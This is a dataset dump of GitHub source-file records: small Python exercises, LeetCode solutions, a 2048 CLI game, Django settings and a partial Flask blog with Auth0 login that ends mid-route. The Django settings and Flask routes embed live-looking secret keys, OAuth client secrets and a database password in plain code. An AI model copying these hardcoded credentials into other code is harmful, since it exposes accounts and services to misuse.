blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dad32eae32751df732af523771da18a910812cc1 | dba1c22426113d32bda17a3d1f1282686649e34d | /week 2/ex_4.py | 0783b1cd9993665035e5cf68fbabb657f0fdb9bb | [] | no_license | gerritvanos/ALDS | 67ab1617c5a6ffceb6e2f682fa87fe5e318fe2cd | 2c4d0d46fc12ab615e347ebc1259e669f86794a4 | refs/heads/master | 2020-04-06T09:46:18.094848 | 2018-12-14T15:04:00 | 2018-12-14T15:04:00 | 157,355,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | def my_bin(n):
assert n>=0
if n==1:
return "1"
elif n%2 ==1:
return my_bin((n-1) / 2) + "1"
elif n%2 ==0:
return my_bin(n/2)+"0"
def test_my_bin():
print("100 in binary with my_bin: 0b",my_bin(100))
print("100 in binary with python function ",bin(100))
print("220 in binary with my_bin: 0b",my_bin(220))
print("220 in binary with python function ",bin(220))
test_my_bin() | [
"gerrit.vanos@student.hu.nl"
] | gerrit.vanos@student.hu.nl |
d52e595dc32e6ffdf0abd0ec6fc0f348ce9ada5e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03089/s662353627.py | 14c606722f6e0774d8c3d2625e893ec714620f0c | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | n = int(input())
b = list(map(int , input().split()))
def f(c):
for i in reversed(range(len(c))):
if c[i] == i+1:
return (c[i], c[:i] + c[i+1:])
return (-1, c)
ans = []
for i in range(n):
(a, b) = f(b)
if a == -1:
print(-1)
exit()
ans.append(a)
#print(ans, b)
print('\n'.join(map(str, reversed(ans))))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
164c530575bcfc51130c5427d7b4d93caa3a5a7a | 3d48586ad6c28755933ab1da478bf003ad56fdde | /template.py | a551620cc8fc15c742128426747f0f92c78c85c9 | [] | no_license | hareshkm999/DVC_Project | 4db3941e67e443e7bc461515611a883f6a1b3182 | b6e18a24f7a5f33ab378f549d6dcf71938954660 | refs/heads/main | 2023-07-25T04:23:08.673414 | 2021-09-07T08:52:08 | 2021-09-07T08:52:08 | 403,842,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 439 | py | import os
dirs = [
os.path.join("data", "raw"),
os.path.join("data","processed"),
"notebooks",
"saved_models",
"src"
]
for dir_ in dirs:
os.makedirs(dir_, exist_ok=True)
with open(os.path.join(dir_, ".gitkeep"), "w") as f:
pass
files = [
"dvc.yaml",
"params.yaml",
".gitignore",
os.path.join("src","__init__.py")
]
for file_ in files:
with open(file_, "w") as f:
pass
| [
"hareshkm999@gmail.com"
] | hareshkm999@gmail.com |
863d4753ef33244930f18c68a24c117304b45e7f | b07b4bc0e95bf1595b9b9507e2a6389535afe7b9 | /system.py | 1be287d4bbdfd167b4ede7ced04339184aba49c6 | [] | no_license | SuryanshAgarwal/Python_learning | 2661aa9a05284242d98d47c24c020a54b485c7e0 | 840da13d4e1ac5157c77db26eee5e23f2383273c | refs/heads/master | 2020-04-23T02:12:31.295554 | 2019-02-15T09:33:43 | 2019-02-15T09:33:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | import sys
print(sys.argv[0])
print(sys.byteorder)
print(sys.float_info.epsilon)
class ABC:
x = 89
t = True
def __init__():
pass
# p1 = ABC()
print(sys.maxsize)
print(sys.getrecursionlimit()) | [
"noreply@github.com"
] | SuryanshAgarwal.noreply@github.com |
86a219a27e1a59ef89f8e50e08819b7ebb8dbc45 | 47c8165b725636298e001a1d6c2fc3c0c2136952 | /2048/cli.py | 4a19f68cec4c682338b36348de47dfdbba452920 | [
"MIT"
] | permissive | S8A/2048 | 3eaf4a577ab05653dcb39bccfbafef910c6248fa | f0ed44e717369c1e3b89e989075d0d15b7928dc3 | refs/heads/master | 2022-09-28T18:26:41.284679 | 2020-05-26T22:31:03 | 2020-05-26T22:31:03 | 266,127,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | import sys
from .board import GameBoard
def main(size, win):
game = GameBoard(size, win)
actions = {'l': game.shift_left,
'r': game.shift_right,
'u': game.shift_up,
'd': game.shift_down,
'undo': game.undo,
'exit': None}
stop = False
while not stop:
print_gameboard(game)
if game.won():
print('You won!')
stop = True
elif game.lost():
print('You lost. Try again.')
stop = True
else:
action = input_action(actions)
if not action:
stop = True
else:
action()
print()
def print_gameboard(gb: GameBoard):
print(f'..:: {gb.win} GAME ::..')
print(f'Score: {gb.get_score()}')
print(f'Moves: {gb.moves}')
print()
print('+'.join(['-'*6 for i in range(gb.size)]))
for row in gb.board:
items = []
for cell in row:
if cell == 0:
items.append(' '*6)
else:
items.append(f' {cell :<4} ')
print('|'.join(items))
print('+'.join(['-'*6 for i in range(gb.size)]))
print()
def input_action(actions):
while True:
user_input = input('Shift board (l/r/u/d) or do action (undo/exit): ')
user_input = user_input.strip().lower()
if user_input in actions.keys():
return actions[user_input]
else:
print('ERROR: Invalid action. Try again.')
| [
"samuelochoap@gmail.com"
] | samuelochoap@gmail.com |
957f02d9987f5e849254ef1bc6109b145e5abde9 | 56345c289644498f96d79dcdbee0476ea4342daa | /lc206.py | bde40f1320931e30c967fe1f94f68470d155c0e8 | [] | no_license | boyima/Leetcode | 8023dd39d06bcb3ebb4c35c45daa193c78ce2bfe | 0802822e1cbf2ab45931d31017dbd8167f3466cc | refs/heads/master | 2020-12-13T06:35:00.834628 | 2019-11-05T22:27:50 | 2019-11-05T22:27:50 | 47,539,183 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 983 | py | #Reverse a singly linked list.
#
# Example:
#
#
#Input: 1->2->3->4->5->NULL
#Output: 5->4->3->2->1->NULL
#
#
# Follow up:
#
# A linked list can be reversed either iteratively or recursively. Could you implement both?
# Related Topics Linked List
#leetcode submit region begin(Prohibit modification and deletion)
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def reverseList(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
if head == None:
return None
dummy = ListNode(0)
dummy.next = head
cur = head
while cur.next is not None:
move = cur.next
cur.next = move.next
move.next = dummy.next
dummy.next = move
return dummy.next
#leetcode submit region end(Prohibit modification and deletion)
| [
"noreply@github.com"
] | boyima.noreply@github.com |
1882eeadfefbc7df490631970ee7297b02479cbf | 89ebbee6dc64570312e1b5957f6ab0c70d5671ef | /surplus_transaction/apps/goods/migrations/0015_auto_20200121_1823.py | e9939ee2baa8e01a1b7393e6c155174053b52b30 | [] | no_license | mengli1/django-secondhand-shop | 2439b35741522f7117fde279d68b6242e0848f89 | 6832b95b78d9adf359a28ee0a9c23d7aba1d9705 | refs/heads/master | 2020-12-21T14:59:29.775433 | 2020-05-06T11:59:06 | 2020-05-06T11:59:06 | 236,467,154 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 741 | py | # Generated by Django 2.2.5 on 2020-01-21 10:23
import ckeditor_uploader.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('goods', '0014_auto_20200121_1428'),
]
operations = [
migrations.AlterField(
model_name='goods',
name='detail',
field=ckeditor_uploader.fields.RichTextUploadingField(blank=True, verbose_name='商品详情'),
),
migrations.AlterField(
model_name='goods',
name='fineness',
field=models.SmallIntegerField(choices=[(3, '7成新及以下'), (2, '8成新'), (1, '9成新'), (0, '全新')], default=0, verbose_name='商品成色'),
),
]
| [
"2761006009@qq.com"
] | 2761006009@qq.com |
ae118bfafb32884ac2572c4ed92fbffe0567ffd2 | 33f8305e37cb5ed1790cfb92ff22d2ad434b1f3e | /GergoPay/settings.py | dc4e38be3cc4788bf9fad7d0466f13bcf274c6e3 | [] | no_license | Shrey1307/GergpPay | 2d95efa6d23ced6dad8f9670c390fe7aed6a9cdd | d3b4a2706d5a5e0771fc85ccb151b5a1d6b0a100 | refs/heads/master | 2023-01-31T13:11:22.846111 | 2018-10-04T07:21:08 | 2018-10-04T07:21:08 | 151,533,250 | 0 | 0 | null | 2023-01-11T18:56:39 | 2018-10-04T07:18:03 | HTML | UTF-8 | Python | false | false | 3,716 | py | """
Django settings for GergoPay project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '45c0^+i*fp$5)8jhr+v%0lilul@ntl2t68u1nn@-b-aq0aa@-@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'pay',
'django_tables2',
'bootstrap3',
'django_filters',
'bootstrapform',
'graphos',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'GergoPay.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'GergoPay.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'admin',
'USER': 'admin123',
'PASSWORD': 'Inno@123!',
'HOST': 'localhost',
'PORT': '',
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'static/images/')
LOGIN_REDIRECT_URL = '/test'
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'
| [
"shrey.saxena@thinqmagic.com"
] | shrey.saxena@thinqmagic.com |
7249037b709c0aa0c8542843b0645547e32df6f8 | a08492c20c6bda0282170fee569f3cd199876ec7 | /scr/return_directories.py | 6e090bc090e123ede17864f4f68be58e20f41193 | [] | no_license | GregoryREvans/evans | a7744011ccd2395e15d325092e85a31379717e6d | 7b0f7caa55e1c4b2a733b9b6fc42230a43313fb6 | refs/heads/master | 2023-08-31T04:29:31.296222 | 2023-08-21T02:32:12 | 2023-08-21T02:32:12 | 143,075,881 | 4 | 1 | null | 2021-06-06T07:27:38 | 2018-07-31T22:22:06 | Python | UTF-8 | Python | false | false | 425 | py | import pathlib
def return_directories(
p="/Users/gregoryevans/Scores",
ignores=("_archive", ".mypy_cache", "_squonk", "akasha", "stirrings_still"),
):
build_path = pathlib.Path(p)
returns = []
for score in sorted(build_path.iterdir()):
if not score.is_dir():
continue
if score.name in ignores:
continue
else:
returns.append(score)
returns
| [
"gregoryrowlandevans@gmail.com"
] | gregoryrowlandevans@gmail.com |
77a5c19e356acc87f9ba6849f393fe5f21034d79 | 4dfb30e4c2790243ee3970e3642b5b453ff10d3d | /30daysofcode/15_linkedlist.py | 8ac5706331d2fc9f92969a52ba65d6f8fea48e34 | [] | no_license | dappledore/hackerrank | b2237ca0031d6687f8ba18d378967f235e8a91ae | f9ef0777afc8347b121b39326c1a7e4c209c394b | refs/heads/master | 2022-12-17T01:47:14.499012 | 2020-09-25T00:19:09 | 2020-09-25T00:19:09 | 286,184,937 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,067 | py | # https://www.hackerrank.com/challenges/30-linked-list/problem
class Node:
def __init__(self, data):
self.data = data
self.next = None
class Solution:
def display(self, head):
current = head
while current:
print(current.data, end=' ')
current = current.next
tail = None
def insert(self, head, data): # quicker n(1)
# print(data) #cheating way
if not head:
head = Node(data)
self.tail = head
else:
self.tail.next = Node(data)
self.tail = self.tail.next
return head
# def insert(self, head, data): #slower method O(n)
# if not head:
# head = Node(data)
# else:
# current = head
# while current.next:
# current = current.next
# current.next = Node(data)
# return head
mylist = Solution()
T = int(input())
head = None
for i in range(T):
data = int(input())
head = mylist.insert(head, data)
mylist.display(head)
| [
"dappledore@gmail.com"
] | dappledore@gmail.com |
bcdec480012510b7512902706b6a8705642cd22e | ca13c0a7f9a8f1d49fd1014c3b186fe24a31baf9 | /20-Course selection I.py | f24ac0e8cba59f81f813bd35623956d42e6e3142 | [] | no_license | ruinanzhang/Leetcode_Solution | 43a5835a96e31e8282a9a2dc23eec360ba3368c9 | d490af6874476d32c9a6c0270c596b2e415f9808 | refs/heads/master | 2023-07-31T04:44:10.717525 | 2021-09-18T01:26:47 | 2021-09-18T01:26:47 | 256,404,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,001 | py | # Tag: Graph
# 207. Course Schedule (LeetCode)
# -----------------------------------------------------------------------------------
# Description:
# There are a total of numCourses courses you have to take, labeled from 0 to numCourses-1.
# Some courses may have prerequisites, for example to take course 0 you have to first
# take course 1, which is expressed as a pair: [0,1]
# Given the total number of courses and a list of prerequisite pairs,
# is it possible for you to finish all courses?
# -----------------------------------------------------------------------------------
# Assumptions:
# The input prerequisites is a graph represented by a list of edges,
# not adjacency matrices. Read more about how a graph is represented.
# You may assume that there are no duplicate edges in the input prerequisites.
# 1 <= numCourses <= 10^5
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# 思路:Topological Sort
# 1. Empty List L, NoIndegree Set S
# 2. Compute Indegree Adj list and OutDegree AdjList
# 3. 找到没有indegree的node,放到NoIndegree Set S里
# 4. While Set S is not emopty:
# 5. remove node n from S
# 6. add n to list L
# 7. For neighbors(nei m) in the OutDegree Adjlist of node n:
# 8. Remove node n from nei m's Indegree Adjlist
# 9. if nei m's Indegree list is empty:
# 10. add m to set S
# 11. If List L's 的size 比 number of nodes 小, 说明有node不能topological sort
# 12.Return False then
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
class Solution:
def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:
# First compute indegree adjlist:
Inlist = {x: []for x in range(numCourses)}
Outlist = {x: []for x in range(numCourses)}
L = []
for i, j in prerequisites:
Inlist[i].append(j)
Outlist[j].append(i)
noInset = []
for x in Inlist:
if len(Inlist[x]) == 0:
noInset.append(x)
if not noInset:
return False
while noInset:
node = noInset.pop(0)
L.append(node)
for nei in Outlist[node]:
Inlist[nei].remove(node)
if not Inlist[nei]:
noInset.append(nei)
if len(L) == numCourses:
return True
return False
# Alternative DFS solution:
def canFinish(self, numCourses, prerequisites):
graph = [[] for _ in xrange(numCourses)]
visit = [0 for _ in xrange(numCourses)]
for x, y in prerequisites:
graph[x].append(y)
def dfs(i):
if visit[i] == -1:
return False
if visit[i] == 1:
return True
visit[i] = -1
for j in graph[i]:
if not dfs(j):
return False
visit[i] = 1
return True
for i in xrange(numCourses):
if not dfs(i):
return False
return True
| [
"rz2363@columbia.edu"
] | rz2363@columbia.edu |
c37631b47a0b6af83326403ee829649b804d3d58 | f9697acaab8a8ee05ccbd5368f6c72ad8c5dd485 | /backend/test_23115/wsgi.py | d1ce4e85722e439b0c888cf764cf31d84dc3e907 | [] | no_license | crowdbotics-apps/test-23115 | f6fd5b199d5586aed78f0a9844062c83ee0ab574 | c6e7f7cf32130aa45fb31bba3fa67ad8e0346e82 | refs/heads/master | 2023-01-24T22:13:58.393735 | 2020-12-01T16:37:00 | 2020-12-01T16:37:00 | 317,603,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
WSGI config for test_23115 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_23115.settings')
application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
16e7a75e20aad03573da75c844a7329f52d68fe5 | 32c56293475f49c6dd1b0f1334756b5ad8763da9 | /google-cloud-sdk/lib/surface/container/node_pools/__init__.py | 245eda35f54a0e9605d06f2abed352e8ec9f670c | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] | permissive | bopopescu/socialliteapp | b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494 | 85bb264e273568b5a0408f733b403c56373e2508 | refs/heads/master | 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 | MIT | 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null | UTF-8 | Python | false | false | 1,982 | py | # -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud container operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.container import container_command_util
from googlecloudsdk.command_lib.container import flags
from googlecloudsdk.command_lib.container import messages
from googlecloudsdk.core import log
class NodePools(base.Group):
"""Create and delete operations for Google Kubernetes Engine node pools."""
@staticmethod
def Args(parser):
"""Add arguments to the parser.
Args:
parser: argparse.ArgumentParser, This is a standard argparser parser with
which you can register arguments. See the public argparse documentation
for its capabilities.
"""
flags.AddZoneAndRegionFlags(parser)
def Filter(self, context, args):
"""Modify the context that will be given to this group's commands when run.
Args:
context: {str:object}, A set of key-value pairs that can be used for
common initialization among commands.
args: argparse.Namespace: The same namespace given to the corresponding
.Run() invocation.
Returns:
The refined command context.
"""
context['location_get'] = container_command_util.GetZoneOrRegion
return context
| [
"jonathang132298@gmail.com"
] | jonathang132298@gmail.com |
ecced9539d46bf6fbd7b966823f1c2751c384a84 | b2e3d6ac8b551cefcd0708ddadd1674fc717f1c3 | /behave.py | 5d55bb8b36726ea28197e6b0f78bbdb2928ca610 | [] | no_license | adsmaicon/teste_simples_pytest | 749cef0ab35e52bdd84fb704a3a297fa58f50e94 | 4c9ef0ee4e815822deeed78a2df0681633b7b0eb | refs/heads/master | 2022-12-07T08:21:31.945846 | 2020-09-03T23:30:18 | 2020-09-03T23:30:18 | 292,157,572 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | #!/usr/bin/env python3.8
import sys
from behave.__main__ import main as behave_main
if __name__ == "__main__":
sys.exit(behave_main())
| [
"m.carvalho@vhsys.com.br"
] | m.carvalho@vhsys.com.br |
6992636345088c5ff23b300d65f558ff32af6e1c | 3f92f2106587a44bb1d8a756246e942931138526 | /ENV/bin/trial | ed0290921f9e1129abac1ff5f11585f624ef2c1f | [
"Apache-2.0"
] | permissive | jacobKKK/IMnight2018_Backend | 36f2c2c86f202a9410d632fca9e374939f338e1e | b5673b1addb2124b79dd653814b7f5773a2921b2 | refs/heads/master | 2021-04-27T18:04:45.362862 | 2018-02-21T12:21:38 | 2018-02-21T12:21:38 | 119,137,846 | 0 | 0 | null | 2018-01-27T06:01:41 | 2018-01-27T06:01:40 | null | UTF-8 | Python | false | false | 265 | #!/Users/YuChih/Project/IMnight2018_Backend/ENV/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from twisted.scripts.trial import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"secret104278@gmail.com"
] | secret104278@gmail.com | |
9105b9a44be0ecd8628f5443fb4af77f70ea6030 | 1958bfbd56a0540d9e56a8a8e017817ce2009571 | /test.py | 290615a778a192a8b174396a98d2f0baad3aab2b | [] | no_license | Heddy147/ias | d020c234519652df1ace410f90b8a87f63a3daf2 | d371a0ce4c9a71243a1eeab93bc57dfaf23b5f91 | refs/heads/master | 2020-12-24T19:28:42.233008 | 2016-05-30T14:12:01 | 2016-05-30T14:12:01 | 59,740,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | import json
def sort_erg(item):
return item["zeit"]
ergebnisse = [
{
"id": 1,
"zeit": "561087"
}, {
"id": 2,
"zeit": "531874"
}, {
"id": 3,
"zeit": "561187"
}, {
"id": 4,
"zeit": "547954"
}
]
sorted_erg = sorted(ergebnisse, key=sort_erg)
print(sorted_erg) | [
"dominik.hendrix@hotmail.de"
] | dominik.hendrix@hotmail.de |
9db2da75b2e59f9d5cadb2023d453c5130274276 | 6d77d68f53e1fa0535154c6e43d19d393d06e14b | /face detect.py | 1dbe8fb1073c295a3959714a38663ea84596399e | [] | no_license | spragad/face_detection_yolo | 7728129608925b9e16457832f6484dd4d18129c4 | 6d34a0e8eacf65e0d0ec647671f2255fe6cde057 | refs/heads/main | 2023-02-02T08:09:15.880450 | 2020-12-17T00:41:12 | 2020-12-17T00:41:12 | 322,130,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,107 | py |
import os
print(os.getcwd())
os.chdir(".../faced-master/")
import cv2
from faced import FaceDetector
from faced.utils import annotate_image
from time import process_time
#___________________________________________________For Image______________________________________________________
face_detector = FaceDetector()
img = cv2.imread("face_det.jpg")
rgb_img = cv2.cvtColor(img.copy(), cv2.COLOR_BGR2RGB)
# Receives RGB numpy image (HxWxC) and
# returns (x_center, y_center, width, height, prob) tuples.
bboxes = face_detector.predict(rgb_img, 0.7)
# Use this utils function to annotate the image.
ann_img = annotate_image(img, bboxes)
#save img
cv2.imwrite('face_detd.jpg', ann_img)
# Show the image
cv2.imshow('Result',ann_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
#____________________________________________________For Video_______________________________________________________
video='Vid.mp4'
cap = cv2.VideoCapture(video)
face_detector = FaceDetector()
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
size = (frame_width, frame_height)
result = cv2.VideoWriter('Face_det_out.mp4',cv2.VideoWriter_fourcc(*'XVID'), 15, size)
pro_time=[]
while(True):
t1_start = process_time()
ret, frame = cap.read()
if ret== True:
rgb_img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# Receives RGB numpy image (HxWxC) and
# returns (x_center, y_center, width, height, prob) tuples.
bboxes = face_detector.predict(rgb_img, 0.7)
# Use this utils function to annotate the image.
ann_img = annotate_image(frame, bboxes)
# Save video
result.write(ann_img)
# Show the image
cv2.imshow('Result',ann_img)
# quit
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
t1_stop = process_time()
pro_time.append(t1_stop-t1_start)
cap.release()
result.release()
cv2.destroyAllWindows()
print("Average Procesing time per frame: ",sum(pro_time)/len(pro_time))
| [
"noreply@github.com"
] | spragad.noreply@github.com |
0c8caba54a6f839b8090f86a54ad68d69011443c | b77d5904a03a6f87649042d46e58be36f7caf645 | /flaskblogg/routes.py | fa0510ee88bc92ea48f9d39e12f90d24b63d7827 | [] | no_license | ezquantum/Flask_Blog_V1 | 64099241a7ec14758db7cc062423769bebe5ff9a | ab45ee275b8e57d9d4b4b600f10a63c2bb75e11b | refs/heads/main | 2022-12-29T08:49:00.489137 | 2020-10-13T03:44:54 | 2020-10-13T03:44:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,181 | py | import os
from urllib.request import urlopen
from flask import request, _request_ctx_stack, abort, Flask, jsonify, render_template, url_for, flash, session, redirect, g
from six.moves.urllib.parse import urlencode
from authlib.integrations.flask_client import OAuth
from dotenv import load_dotenv, find_dotenv
from werkzeug.exceptions import HTTPException
from os import environ as env
from flaskblogg import app
import json
from functools import wraps
from flaskblogg.forms import RegistrationForm, LoginForm, PostForm
from jose import jwt
from flaskblogg.models import User, Post, db, db_drop_and_create_all
from .auth import auth
from .auth.auth import requires_auth, AuthError
# from flaskblog.auth import AuthError, requires_auth
# db.create_all()
posts = [
{
'author': 'Corey Schafer',
'title': 'Blog Post 1',
'content': 'First post content',
'date_posted': 'April 20, 2018'
},
{
'author': 'Jane Doe',
'title': 'Blog Post 2',
'content': 'Second post content',
'date_posted': 'April 21, 2018'
}
]
@app.route("/")
@app.route("/home")
def home():
return render_template('home.html', posts=posts)
@app.route("/about")
def about():
return render_template('about.html', title='About')
# native registration supported
@app.route("/register", methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
flash(f'Account created for {form.username.data}!', 'success')
return redirect(url_for('home'))
return render_template('register.html', title='Register', form=form)
# @app.route("/login", methods=['GET', 'POST'])
# def login():
# form = LoginForm()
# if form.validate_on_submit():
# if form.email.data == 'admin@blog.com' and form.password.data == 'password':
# flash('You have been logged in!', 'success')
# return redirect(url_for('home'))
# else:
# flash('Login Unsuccessful. Please check username and password', 'danger')
# return render_template('login.html', title='Login', form=form)
@app.route('/login')
def login():
# # redirect_uri = url_for('authorize', _external=True)
return auth0.authorize_redirect(redirect_uri='http://localhost:5000/callback')
###########test###########
# import http.client
# conn = http.client.HTTPSConnection("coffestack.us.auth0.com")
# payload = "{\"client_id\":\"KoJK3ZANDBUo3MqQ89kuJDihHyorWMHG\",\"client_secret\":\"KdhzQGTwrFongHpHutXt40YPKTi5CmIqeQ0bVgR54UvlvMPTrucW7SsCmSo1loSp\",\"audience\":\"blog\",\"grant_type\":\"client_credentials\"}"
# headers = {'content-type': "application/json"}
# conn.request("POST", "/oauth/token", payload, headers)
# res = conn.getresponse()
# data = res.read()
# print(data.decode("utf-8"))
@app.route('/logout')
def logout():
# Clear session stored data
session.clear()
# Redirect user to logout endpoint
params = {'returnTo': url_for('home', _external=True),
'client_id': 'kfrmwrB4PMIsXz3ZxWl07tVNGejZQZgW'}
return render_template('logout.html',
userinfo=None,
userinfo_pretty=None, indent=4)
@ app.route('/dashboard')
@ auth.requires_auth()
def dashboard():
return render_template('dashboard.html',
userinfo=session['profile'],
userinfo_pretty=json.dumps(session['jwt_payload'], indent=4))
oauth = OAuth(app)
auth0 = oauth.register(
'auth0',
client_id='kfrmwrB4PMIsXz3ZxWl07tVNGejZQZgW',
client_secret='EXS6SuDnxzclxF9qK_4BdgN58HsCxTPIiQ3HEvsNTDEGk2vczatJy-l3svPZwg4r',
api_base_url='https://coffestack.us.auth0.com',
access_token_url='https://coffestack.us.auth0.com/oauth/token',
authorize_url='https://coffestack.us.auth0.com/authorize',
client_kwargs={
'scope': 'openid profile email',
},
)
# /server.py
# Here we're using the /callback route.
@ app.route('/callback')
def callback_handling():
# Handles response from token endpoint
auth0.authorize_access_token()
resp = auth0.get('userinfo')
userinfo = resp.json()
# Store the user information in flask session.
session['jwt_payload'] = userinfo
session['profile'] = {
'user_id': userinfo['sub'],
'name': userinfo['name'],
'picture': userinfo['picture']
}
print('session')
print(session)
# print(session['profile'])
return redirect('/')
@app.route('/post/new', methods=['GET', 'POST'])
# @auth.requires_auth()
